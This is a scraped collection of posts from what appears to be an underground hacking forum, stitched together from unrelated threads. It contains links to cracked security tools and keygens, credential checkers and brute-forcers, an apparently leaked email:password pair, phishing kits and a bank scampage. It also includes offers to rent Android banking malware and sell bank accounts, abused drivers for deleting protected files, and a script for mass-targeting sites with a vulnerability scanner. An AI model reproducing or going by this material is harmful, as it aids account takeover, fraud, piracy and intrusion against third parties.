data.append([formatted_url, f"'{text}'"])
with open(output_file, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerows(data)
# названия файлов
input_file = 'input.txt'
output_file = 'output.csv'
# коментарий
text = 'xss.is'
process_urls(input_file, output_file, text)
дальше просто грузите по 500 строк в акунетикс и радуетесь большому кол-ву таргетов
Spoiler: если нравится np++
берём файл со всеми юрлами и нажимаетм ctrl+h, найти '^([^.]+[^/]+/).*$'
заменить на '\1'
дальше найти '$' заменить на ','
и последний раз найти '/,' заменить на ',"xss.is"'
и не забываем прожать чекбокс регуляр. выражения
Не знаю, заинтересует ли кого-нибудь этот документ. Лично я не знал об этой программе, которая, очевидно, очень часто используется полицией в США.
](https://anonfiles.com/p2mam3R8x1/clear-user-guide_pdf)
anonfiles.com
CLEAR опирается на миллиарды точек данных и использует передовую технологию публичных записей для объединения всего ключевого контента в настраиваемую приборную панель. Найдите труднодоступную информацию и быстро определите потенциальные проблемы, связанные с людьми и предприятиями, чтобы определить необходимость дальнейшего анализа. Удобная платформа была разработана с интуитивно понятной навигацией и простыми параметрами фильтрации, поэтому вы можете быстро осуществлять поиск по тысячам наборов данных и получать точные результаты за меньшее время.
Click to expand...
[video=youtube]
PROXY : ONLY USE HTTP/HTTPS
CPM : 100-300 (LQ PROXY)
CPM : 350-700 (HQ PROXY)
AUTO SAVE HITS
download:
Hidden content for authorized users.
Securely upload your files, media and documents to more than 30 cloud storage providers simultaneosuly. Remote Upload files to Google Drive and many other hosts.
www.mirrored.to
vt: https://www.virustotal.com/gui/file...ed89d768ce7848e2a3dfb2a5ece1f054146?nocache=1
Давно лежит без дела архив по фишингу yandex, mail, google, rambler и vk. Скрипт нерабочий уже как пару лет) Но может кто допилит под себя....
https://mega.nz/file/3sNnWAjJ#zs2UochSu-jROE9lVZgIYG3sVChEV1CelKFoCfb41BQ
IMPROVEMENTS
Added a MaxAuthenticationTime configuration and set the default value as 480
seconds
FIXES
Fixed a bug that was preventing the import of WSDL files to Invicti Standard
Fixed version information reported in Web App Fingerprint Vulnerabilities
Please share if you have any.
I am very interested in Kaspersky, MVISION, CrowdStrike, Sentinel, Symantec, Cynet and others...
Thank you!
Bulk purchase of U.S. checking accounts
Changelog:
NEW SECURITY CHECKS
- Added Remote Code Execution (CVE-2022-22965) a.k.a. Spring4Shell detection
support.
](https://anonfiles.com/72k7B2Ubx4/Invicti-Standard-6.4.3.35616_torrent)
anonfiles.com
Hello guys,
Before I write anything, Sorry iam not sure if this is allowed, I know,
selling Hook itself is not allowed since it's not my Work.
But is it allowed to sell renting Hook? Since this is a different thing I must
ask. If no, then just delete this post please. I myself don't really use Hook
since iam not motivating on spreading and all this shit. I know I could get
more money with it with a good spreading method, but iam bad in spreading
anyway.
If it's allowed I write detailed information how exactly, well it's like the
beginning of Hook where it was for renting only, one vps is needed and the
other one, the fast flux server is mine.
Anyway please let me know.
Greetz
ASM Visual Pro 1.1.6.0 (Cracked by atavism)
В общем-то, я захотел вечерком немного отдохнуть, между основной работой,
поэтому, решил "крякнуть" IDE для асма: [ASM Visual](https://gri-
software.com/en/asmvisual/). Плюсом ко всему мне не нравилась плашка "Trial" в
окне лицензии.
IDE поддерживает такие диалекты, как TASM (16 и 32 разрядности), MASM
(x32-x64) и FASM (x32-x64). Также, присутствует возможность прикрутить
отладчик на выбор (Olly, x64dbg и вроде WinDbg). Еще из плюсов отмечу
возможность создания сниппетов (часто используемых конструкций кода).
Может быть, кому-то из вас пригодится.
Линк (пасс местный):
https://anonfiles.com/U86eq2A4y1/ASM_Visual_Pro_1.1.6.0_Cracked_by_atavism_zip
Прикладываю также скан с VT на измененный бинарник:
https://www.virustotal.com/gui/file...f3c271e63ff46414eabce99d3e4adf7df2d/detection
Так как изначально бинарник был накрыт реактором , то он выдал 2
детекта.
Покушать: 0x6A61605296dC0178D6dB5c00867555a69F8547df (ETH)
Всем привет может кому то пригодиться .
1- заходим на оф сайт https://www.httpdebugger.com/
2- качаем устанавливаем .
3- выключаем софт после установки и юзаем кейген ссылка ниже .
4- https://www.sendspace.com/file/ij5bqp
Надеюсь я кому то помог
обновите eё от рута используя acunetix_14.7.220425114_x64.sh
video;
[video=youtube]
virustotal : https://www.virustotal.com/gui/file...aa2e629eb0a63069a27e02efba7102d6c57?nocache=1
download link :
Hidden content for authorized users.
files to multiple hosts ](https://www.mirrored.to/files/0ZAFLECU/Trendyol_Brute_Checker_V1.rar_links)
Securely upload your files, media and documents to more than 30 cloud storage providers simultaneosuly. Remote Upload files to Google Drive and many other hosts.
www.mirrored.to
i was researching about this but did not find good results
suggest offline translator for russian
I found an ftp access that apparently receives license plates. It might be useful for something, enjoy
You must have at least 1 reaction(s) to view the content.
Доброго времени суток, ищу чекер почт на привязку к мобильной игре pubg
mobile.
А так же чекер STEAM, если будет ещё и с выгрузкой игр на аккаунте, было бы
шикарно.
я не скину poc код.
vt
wscfd.exe - runs a "wscfd.bat". This isn't rlly vuln, I just used it to load
drivers because signed executable running batch file which loads drivers is
less suspicious.
vt
IUForceDelete.sys - дает удалить все via ioctl ( this driver is from IoBit and
is not currently shipped, dont ask how i have it)
vt
WiseDelfile64.sys - дает удалить все via ioctl ( unreported )
Piaproxy недорого
Связь ТГ @PonkaMcDuck
Software License : Enterprise Edition
Version : 15.1.0.15104
Filename : Colasoft Capsa Enterprise Edition v15.1.0.15104 x64 Full
Activated.zip
Size : 403.9 MB
https://www.up-4ever.net/k40hu0y7hlv1
Hello.
I need some help. I want to update some codes so the debug build does not
crashes anymore which I hope.
For example this code:
fun Context.browse(url: String, newTask: Boolean = false): Boolean {
try {
val intent = Intent(Intent.ACTION_VIEW)
intent.data = Uri.parse(url)
if (newTask) {
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
}
startActivity(intent)
return true
} catch (e: ActivityNotFoundException) {
IOSocketyt.sendLogs("", e.localizedMessage, "error")
return false
I get error Type mismatch, inferred Type is String? But String was expected,
the error occurs on e.localizedMessage, if I change it too e.localizedMessage
?: "Unknown error", "error") the error is gone.
But what exactly does that mean now?
Please for any help
1
Credits go to the developer:
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fedd796dbe95ab9b0b2e90a38e71051a3e9be9e15b7b5b7cb6f9fff294ea00e90%2FDanz17%2FProxifier- Keygen&hash=7317d67ea858ead1dbc1957a456bf555&return_error=1)
Keygen)
Contribute to Danz17/Proxifier-Keygen development by creating an account on GitHub.
github.com
Tested working up to the latest Proxifier version (4.7)
You can download the attached compiled version for simplicity.
/NR
Всем привет! Хотел поставить ботнет, но при попытке подключения через ssh в указанной в заголовке программой, выясняется, что нет папки пользователя на сервере. Я уже попробовал штук 15 сайтов: ни к одному успешно так и не подключился.
Может вы знаете варианты исправления этой проблемы?
Собственно название темы говорит само за себя поделитесь файлом оригинальным Burp bounty. Смены как обычно лукас
Поделитесь?
Кто шарит что за программа Sessions похожа на токс.
Говорят там сразу через тунели автоматом коннектит и тд и безопаснее токса,
или то мне бред сказал человек?
Всем привет, подскажите есть ли готовые решения многопоточных брутов FTP и MySQL , которые себя зарекомендовали. Заранее спасибо.
Добрый день, возможно кто либо знает как сделать контейнер на флешке с вера криптой и whonix, при этом чтобы это все было доступно из любого компьютера?
This is CyberTriage 3.5.0 Cracked
Web : https://www.cybertriage.com/
Passw : Pwn3rzs
Infos : You can use included "Reset.cmd" to reset old license
Download: https://t.me/Pwn3rzs/596
В общем нужен небольшой софт для брута pokerdoma (онлайн казино и тд). Готов
купить рабочий софт > и + к ней .
Первый контакт через ЛС форума.
Подскажите актуальный парсер или доркер для автоматического поиска сайтов для
дальнейшего скана.
Сорри за тупой вопрос, надеюсь на понимание.
HCL_AppScan_Standard_v10.0.7.28135
](https://anonfiles.com/Ne46DdR5xd/HCL_AppScan_Standard_v10.0.7.28135.zip_torrent)
anonfiles.com
Download boxedapppackerapi__with_sources.rar on Solidfiles.
www.solidfiles.com
__
upload.net/download-14662700/boxedapppackerapi__with_sources.rar.html)
Leider konnte Ihre hochgeladene Datei nicht gefunden werden. Laden Sie die Datei neu hoch.
www.file-upload.net
__
](https://www.upload.ee/files/13393160/boxedapppackerapi__with_sources.rar.html)
File does not exist. Upload.ee
www.upload.ee
](https://www.mediafire.com/file/6s9udjfl5unyp8y/boxedapppackerapi__with_sources.rar/file)
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
Всем привет где можно найти старые версии Citrix adc?
По типу таких версий
https://gist.github.com/youncyb/6cdeac5c1f413273c97e356543e90c94
Здравствуйте!
Где можно скачать BurpSuite Professional бесплатно, возможно какие либо кряки
и тп.
Keys comes on the txt
Scan:
https://www.virustotal.com/gui/file...
Download: https://anonfiles.com/R4tbN8ney6/Proxifier_3.3_zip
Setup:
](https://anonfiles.com/fal0B8U0x7/Fortify_SCA_and_Apps_20.2.2_torrent)
anonfiles.com
Вопрос в загаловке
Software License : PRO
Version : 3.14.1
Filename : Sparkol VideoScribe Pro 3.14.1 x64 Full Activated – Animated Video
Maker.zip
Size : 134.6 MB
https://www.up-4ever.net/v2v3nb22ukdz
Данная программа поможет переводить вам pdf docx и тд на другие языки, без
потери формата документа.
This program will help you translate pdf docx etc into other languages without
losing the format of the document.
Download/Скачать:
https://transfiles.ru/lrh11
Pass - nra02g
[BAS] Fiverr Cookie Checker - Source Code
Developed using: Bablosoft.com
Results are saved to C:\CashOutGang by default
Just load your cookies folder
You must have at least 20 reaction(s) to view the content.
Поделитесь плиз мячиком портабл без склеек со всякой хренью. Есть же у кого нибудь?
У кого остался playbit-овский чистый eternaldark? Когда-то один человек сливал, сейчас не могу найти.
McAfee Endpoint Security Licensed
McAfee Endpoint Security delivers centrally managed defenses with integrated capabilities like endpoint detection and response and machine learning analysis. Protect your Windows, Mac, and Linux systems with multiple, collaborative defenses and automated responses.
McAfee Endpoint Security Features
Download Link
Code:Copy to clipboard
Download - https://mega.nz/file/BItEhBpZ#1NP7hFU_f4S_9_6rVXO9YkkEp5Br2S6bd-e9M0BsDf0
VT Scan - https://www.virustotal.com/gui/file/4f4295245ddc2ac775b7b02c500d42908b2d3b362b2483baa728dfd61d6186d9
Всем привет
Ищу человека который может написать скрипт на Silver Bullet или может
предложит варианты по лучше
Мне нужно что бы он чекал mail:pass на валид, а так же давал отчет о
количестве писем о моем запросе
Всем добра
In PM
Может есть что-то подобное, автоматически подставлять популярные домены
почтовиков по типу gmail/outlook/aol/yahoo, загрузить базу user:pass и в итоге
получить результат в таком виде:
User@gmail.com:pass
User@aol.com:pass
user@hotmail.com:pass
Цель - сделать так, чтобы через телефон этого человека прошел трафик в большом объеме
checker video ;
[video=youtube]
virustotal : https://www.virustotal.com/gui/file...d5238ac1445d466cc3f0a5255c3e9898e33?nocache=1
Disney Plus Checker V1 Down Links x21 ;
Hidden content for authorized users.
](https://upload.ee/files/13674144/Disney_Plus_CHECKER_V1.rar.html)
Disney_Plus_CHECKER_V1.rar - Download. Upload.ee
upload.ee
](https://www116.zippyshare.com/v/gXxWJds7/file.html)
Zippyshare.com - Free File Hosting
www116.zippyshare.com
Download Disney_Plus_CHECKER_V1.rar on Solidfiles.
www.solidfiles.com
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
](https://gofile.io/d/2zpq36)
Gofile is a free, secure file sharing and storage platform. With unlimited bandwidth and storage, you can easily store and share files of any type without any limits. Our advanced features, such as CDN support and password protection, make Gofile the ideal choice for individuals and businesses...
gofile.io
https://download.gg/file-12908023_a34e7b34736548e8
__
Download File
clicknupload.cc
![megaup.net](/proxy.php?image=https%3A%2F%2Fmegaup.net%2Fthemes%2Fflow%2Ffrontend_assets%2Fimages%2Ficons%2Ffavicon%2Fapple- touch-icon-114x114.png&hash=35c431792ed4ac91cbd593c36ee91f9b&return_error=1)
](https://megaup.net/1Grgk)
Download file - Hightown.S02E09.720p.WEB-DL.Movizland.Fun.mp4
megaup.net
mixdrop.co
DLUpload is a search engine and file monitization platform. DLUpload has over 15 millions + files hosted by publishers. DLUpload is a single place to search for files.
dlupload.com
uptobox.com
Download File
dailyuploads.net
](https://bayfiles.com/17l8p7Y0u4/Disney_Plus_CHECKER_V1_rar)
bayfiles.com
](https://anonfiles.com/zblfp1Y4u2/Disney_Plus_CHECKER_V1_rar)
anonfiles.com
__
](https://www.upload.ee/files/13674142/Disney_Plus_CHECKER_V1.rar.html)
File does not exist. Upload.ee
www.upload.ee
__
Drop Download
drop.download
](https://letsupload.io/1Ixs2/Disney_Plus_CHECKER_V1.rar)
Error
letsupload.io
Userscloud Free Unlimited Cloud Storage
userscloud.com
__
](https://hitfile.net/outg0av)
Search the unlimited storage for files? Hitfile.net is the best free file hosting. We are available for ftp file upload, multiple file upload or even remote file upload.Search the unlimited storage for files? Hitfile.net is the best free file hosting. We are available for ftp file upload...
hitfile.net
https://drop.download/rctlbnuhkw
Share unlimited files using our free cloud service
tusfiles.com
video :
[video=youtube]
virustotal link :
https://www.virustotal.com/gui/file...ec0b85b1dcce35dc99ac1e4ece7c8ec4d92?nocache=1
save hits : yes
unlimited thread
save type:
ACCOUNT:
ismaelhernandez1230@gmail.com:Kamehameha1
CAPTURE: [VERIFIED = False | TYPE PLAN = cr.ios.fanpack.monthly | FREEMIUM = False]
TYPE: SUCCESS
download link :
Hidden content for authorized users.
__
to multiple hosts ](https://www.mirrored.to/files/0FYYCC86/Crunchyroll_Checker_V1.rar_links)
Securely upload your files, media and documents to more than 30 cloud storage providers simultaneosuly. Remote Upload files to Google Drive and many other hosts.
www.mirrored.to
ING GERMANY BANK SCAMPAGE 2023
VirusTotal Link:
https://www.virustotal.com/gui/file...291da17e60b799ae54334826bcb510866f2?nocache=1
---- RU Thread ----
Привет XSS-сообществу,
Я работаю с OpenBullet уже долгое время, но у меня всегда одна и та же проблема, когда я создаю свои конфигурации. Когда я делаю запрос POST или GET, я всегда получаю этот ответ от службы безопасности CloudFlare :
HTML:Copy to clipboard
Response Source:
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>Attention Required! | Cloudflare</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />
<!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->
<style>body{margin:0;padding:0}</style>
<!--[if gte IE 10]><!-->
<script>
if (!navigator.cookieEnabled) {
window.addEventListener('DOMContentLoaded', function () {
var cookieEl = document.getElementById('cookie-alert');
cookieEl.style.display = 'block';
})
}
</script>
<!--<![endif]-->
</head>
<body>
<div id="cf-wrapper">
<div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
<div id="cf-error-details" class="cf-error-details-wrapper">
<div class="cf-wrapper cf-header cf-error-overview">
<h1 data-translate="block_headline">Sorry, you have been blocked</h1>
<h2 class="cf-subheadline"><span data-translate="unable_to_access">You are unable to access</span> site.com</h2>
</div><!-- /.header -->
<div class="cf-section cf-highlight">
<div class="cf-wrapper">
<div class="cf-screenshot-container cf-screenshot-full">
<span class="cf-no-screenshot error"></span>
</div>
</div>
</div><!-- /.captcha-container -->
<div class="cf-section cf-wrapper">
<div class="cf-columns two">
<div class="cf-column">
<h2 data-translate="blocked_why_headline">Why have I been blocked?</h2>
<p data-translate="blocked_why_detail">This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.</p>
</div>
<div class="cf-column">
<h2 data-translate="blocked_resolve_headline">What can I do to resolve this?</h2>
<p data-translate="blocked_resolve_detail">You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.</p>
</div>
</div>
</div><!-- /.section -->
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f1b77cc5f30ed90</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">0.0.0.0</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div><!-- /#cf-error-details -->
</div><!-- /#cf-wrapper -->
<script>
window._cf_translation = {};
</script>
<script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f1b77cc5f30ed90',t:'MTczNDE1MDcyNC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script><script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"8f1b77cc5f30ed90","version":"2024.10.5","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}},"token":"2c91401934804e8b9c7478587a0e73f4","b":1}' crossorigin="anonymous"></script>
</body>
</html>
Есть ли способ обойти это или просто перестать получать от них этот флаг безопасности. Любой опытный пользователь OpenBullet может помочь мне решить эту проблему?
Свяжитесь со мной:
qtox:
275D8AF038C54F81E6B91EF229E94AC1B23D7436145D10E794BC1CDC5B523657144E6EC41CD4
TG: gwap22
Signal: sqli.3306
---- EN Thread ----
Hello XSS Community,
I have work with OpenBullet for a good time now but I always have the same issue when I created my configs. When I do POST or GET request I get always this response from CloudFlare security :
HTML:Copy to clipboard
Response Source:
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>Attention Required! | Cloudflare</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />
<!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->
<style>body{margin:0;padding:0}</style>
<!--[if gte IE 10]><!-->
<script>
if (!navigator.cookieEnabled) {
window.addEventListener('DOMContentLoaded', function () {
var cookieEl = document.getElementById('cookie-alert');
cookieEl.style.display = 'block';
})
}
</script>
<!--<![endif]-->
</head>
<body>
<div id="cf-wrapper">
<div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
<div id="cf-error-details" class="cf-error-details-wrapper">
<div class="cf-wrapper cf-header cf-error-overview">
<h1 data-translate="block_headline">Sorry, you have been blocked</h1>
<h2 class="cf-subheadline"><span data-translate="unable_to_access">You are unable to access</span> site.com</h2>
</div><!-- /.header -->
<div class="cf-section cf-highlight">
<div class="cf-wrapper">
<div class="cf-screenshot-container cf-screenshot-full">
<span class="cf-no-screenshot error"></span>
</div>
</div>
</div><!-- /.captcha-container -->
<div class="cf-section cf-wrapper">
<div class="cf-columns two">
<div class="cf-column">
<h2 data-translate="blocked_why_headline">Why have I been blocked?</h2>
<p data-translate="blocked_why_detail">This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.</p>
</div>
<div class="cf-column">
<h2 data-translate="blocked_resolve_headline">What can I do to resolve this?</h2>
<p data-translate="blocked_resolve_detail">You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.</p>
</div>
</div>
</div><!-- /.section -->
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f1b77cc5f30ed90</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">0.0.0.0</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div><!-- /#cf-error-details -->
</div><!-- /#cf-wrapper -->
<script>
window._cf_translation = {};
</script>
<script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f1b77cc5f30ed90',t:'MTczNDE1MDcyNC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script><script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"8f1b77cc5f30ed90","version":"2024.10.5","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}},"token":"2c91401934804e8b9c7478587a0e73f4","b":1}' crossorigin="anonymous"></script>
</body>
</html>
Is there a way I can bypass this or just stop getting this security flag from them. Any experienced OpenBullet user can guide me solving this ?
Contact me:
qtox:
275D8AF038C54F81E6B91EF229E94AC1B23D7436145D10E794BC1CDC5B523657144E6EC41CD4
TG: gwap22
Signal: sqli.3306
Download https://download.ru/folders/0OPpfNH8
Всем пионерский привет!
http://offware.ru/ --> Никому не попадался этот красавчик (S3 Nuke command center)? Кто что знает о нем, о конторе, команде?
Скачал, установил тор, но вижу вот это. Если смотреть на это с обобщающей точки зрения то мне всё равно, однако интересно, как сделать отображение страницы на подобии хрома (без этих фиолетовых линий по краям)
I have a whole cloud for private and very HQ source codes for bruters, checkers, developers, scrapers.... you name it...
If anyone is interested in swapping source, feel free to DM me on telegram
KrbRelayEx is a tool designed for performing Man-in-the-Middle (MitM) attacks by relaying Kerberos AP-REQ tickets. It listens for incoming SMB connections and forwards the AP-REQ to the target host, enabling access to SMB shares or HTTP ADCS (Active Directory Certificate Services) endpoints on behalf of the targeted identity
This tool is intended exclusively for legitimate testing and assessment
purposes, such as penetration testing or security research, with proper
authorization.
Any misuse of this tool for unauthorized or malicious activities is strictly
prohibited and beyond my responsibility as the creator. By using this tool,
you agree to comply with all applicable laws and regulations.
I created this tool to explore the potential misuse of privileges granted to the DnsAdmins group in Active Directory, focusing on their ability to modify DNS records. Members of this group are considered privileged users because they can make changes that impact how computers and services are located within a network. However, despite this level of access, there has been relatively little documentation (apart from CVE-2021-40469) explaining how these privileges might be exploited in practice.
Manipulating DNS entries isn’t exclusive to the DnsAdmins group. Other scenarios can also enable such attacks, such as:
The goal of this tool was to test whether a Man-in-the-Middle (MitM) attack could be executed by exploiting DNS spoofing, traffic forwarding, and Kerberos relaying. This is particularly relevant because Kerberos authentication is commonly used when a resource is accessed via its hostname or fully qualified domain name (FQDN), making it a cornerstone of many corporate networks.
Building upon the concept, I started from the great KrbRelay framework and developed this tool in .NET 8.0 to ensure compatibility across both Windows and GNU/Linux platforms.
Relay and Forwarding Modes :
KrbRelayEx intercepts and relays the first authentication attempt, then
switches to forwarder mode for all subsequent incoming requests. You can press
r anytime to restart relay mode.
Scenarios for Exploitation :
Background Consoles :
These are ideal for managing multiple SMB consoles simultaneously.
Software License : Professional Edition
Version : 10.5.0.28320
Filename : HCL AppScan Standard v10.5.0.28320 Full Activated.zip
Size : 673.8 MB
https://www.up-4ever.net/pjqmmgtmzyye
[Link](https://ipfs.io/ipfs/QmUmsJH2hzKk18B1pc8tZBD1eTuFnNhvR3PJYBs2mgXwEG?filename=Invicti-
Professional-v23.8-Pwn3rzs-CyberArsenal.rar)
Pass: Pwn3rzs
stealing kernel-mode shellcode ](https://github.com/winterknife/PINKPANTHER)
Windows x64 handcrafted token stealing kernel-mode shellcode - GitHub - winterknife/PINKPANTHER: Windows x64 handcrafted token stealing kernel-mode shellcode
github.com
В дикой природе не нашел ни одного нормального аналога Maltego.
Может есть что-то в опенсурсе или доступное для обывателя, но не скудное на функционал?
Пс, куплю ключи office 2016, 2019, 365, 2021
пиши в лелегу m0dHEX
Random leak from our client. For using u can ask in my telegram - Arivite [t.me/Arivite]
VirusTotal -
youk
Download - https://files.fm/f/4h3gmzzqzq
Хотите заплатить, чтобы найти и порекомендовать эффективный инструмент для перебора PostgreSQL? Он должен поддерживать большой словарь.
Вы можете оставить свой Jabber
2022
Нужно Пару софтов запилить
Строго через гаранта
Сумма сделки от 50$ и выше (договор)
HashiroFire
при запуске выдаёт ошибку хотя кроме этой версии другой у меня не скачено
Нужна программа что создает такой список как сайт генерирует https://generator.email/blog/gmail-generator с возможностью подставить домен.
Гуглить - гуглил.
Изучать логи - изучал.
тем не менее - армитажка работать не хочет.
кидаю лог, надеюсь на помощь
Code:Copy to clipboard
Warning: checkError(): org.postgresql.util.PSQLException: Connection to localhost:5432 refused. Check that the hostname and port are correct and that the postmaster is accepting TCP/IP connections. at preferences.sl:419
** Error ** ** Error ** ** Error ** ** Error ** ** Error **
Could not connect to the Metasploit database. It's possible
that it's not running. Follow the database troubleshooting
steps at:
http://www.fastandeasyhacking.com/start
Also note: the latest Metasploit installer (4.1.4+) does not
create a postgres start script for you. This would explain
why Metasploit's database isn't running. To create one, put:
exec /usr/share/postgresql/scripts/ctl.sh "$@"
in /etc/init.d/framework-postgres. Then start the database:
service framework-postgres start
Мы объявляем о создании нового сервиса по телефонии и все что с этим связано в РБ - Беларусью.
НАШИ ФУНКЦИИ
- Телефония с кодом +375 (тариф 0,38)
- Исходящие звонки
- входящие звонки
- получение смс
- аренда номера на разный срок
И многое, многое другое, друзья для тех кто работает по Беларуси, мы создаем сервис, который вырастет в экосистему и мы будем только расти и улучшать свой потенциал, это и многое другой к нам в TG @molodoy00o
Hello
I have available for work Personal and Business bank accounts.
Countries available: IT, ES, DE, BE, NL, UK, BG, PL, HU
Also I have ready Android and Windows RATs for collaboration.
t.me
Иущ чекер фулок на подлинность
либо на кредит
